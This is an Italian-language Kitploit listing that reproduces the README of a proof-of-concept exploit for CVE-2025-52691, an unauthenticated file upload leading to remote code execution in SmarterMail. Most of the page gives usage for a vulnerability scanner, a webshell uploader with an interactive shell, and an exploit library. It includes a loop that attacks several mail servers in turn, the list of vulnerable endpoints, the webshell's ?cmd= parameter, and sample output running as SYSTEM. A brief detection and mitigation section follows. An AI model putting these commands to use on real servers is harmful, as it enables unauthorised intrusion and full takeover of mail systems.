Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-52691-poc — Exploit proof-of-concept per CVE-2025-52691: upload arbitrario di file non autenticato che porta a RCE in SmarterMail. Include scanner di vulnerabilità, uploader di webshell ASPX e shell interattiva per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
Scanner di VulnerabilitàGenerazione di PayloadAnalisi delle VulnerabilitàExploitShellcodeSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHub
rimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

Exploit proof-of-concept per CVE-2025-52691: upload arbitrario di file non autenticato che porta a RCE in SmarterMail. Include scanner di vulnerabilità, uploader di webshell ASPX e shell interattiva per test di sicurezza autorizzati.

Vedi Repository
338 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-52691 POC

Prova di concetto per CVE-2025-52691 - SmarterMail Caricamento arbitrario di file non autenticato RCE

⚠️ Disclaimer

Solo per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato è illegale.

Panoramica

Vulnerabilità critica in SmarterMail che consente il caricamento arbitrario di file non autenticato tramite path traversal, portando a Remote Code Execution.

Vulnerabilità: Path traversal negli endpoint di upload consente il caricamento di webshell ASPX nella root web
Impatto: Remote Code Execution non autenticato
Vettore: Rete / Non autenticato

Installazione

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

Strumenti

check.py - Scanner di vulnerabilità

Scansiona i target per la vulnerabilità CVE-2025-52691. Salva solo gli URL vulnerabili nel file di output.

root@kitploit:~
# Singolo target
python check.py https://mail.example.com

# Target multipli
python check.py -f targets.txt -o results.txt

# Timeout personalizzato
python check.py https://mail.example.com -t 30

Output: Un URL vulnerabile per riga in results.txt

pwn.py - Strumento di sfruttamento

Carica una webshell ASPX e fornisce l'esecuzione di comandi.

root@kitploit:~
# Sfruttamento base
python pwn.py https://mail.example.com

# Esegui comando
python pwn.py https://mail.example.com -c "whoami"

# Shell interattiva
python pwn.py https://mail.example.com -i

exploit.py - Libreria Python

Modulo di sfruttamento riutilizzabile per l'integrazione in script personalizzati.

Come libreria:

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

Come script indipendente:

root@kitploit:~
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

Dettagli tecnici

Endpoint vulnerabili:

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

Metodi di sfruttamento:

  • Caricamento multipart form con path traversal (../wwwroot/)
  • POST grezzo con intestazioni personalizzate
  • Payload JSON con contenuto codificato in base64

Webshell: Shell ASPX minima che accetta comandi tramite il parametro ?cmd=

Flusso di attacco

  1. Scansiona il target: python check.py <target>
  2. Sfrutta: python pwn.py <target> -i
  3. Esegui comandi nella shell interattiva

Rilevamento e mitigazione

Rilevamento:

  • Monitora i caricamenti di file ASPX nelle directory web
  • Controlla i log per pattern di path traversal (../)
  • Allerta su richieste /api/upload inattese

Mitigazione:

  • Aggiorna SmarterMail all'ultima versione
  • Implementa una validazione rigorosa del percorso file
  • Distribuisci WAF con filtro upload
  • Richiedi autenticazione sugli endpoint di upload

Esempio

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

Ottieni sempre l'autorizzazione appropriata prima di testare.

Scarica lo strumento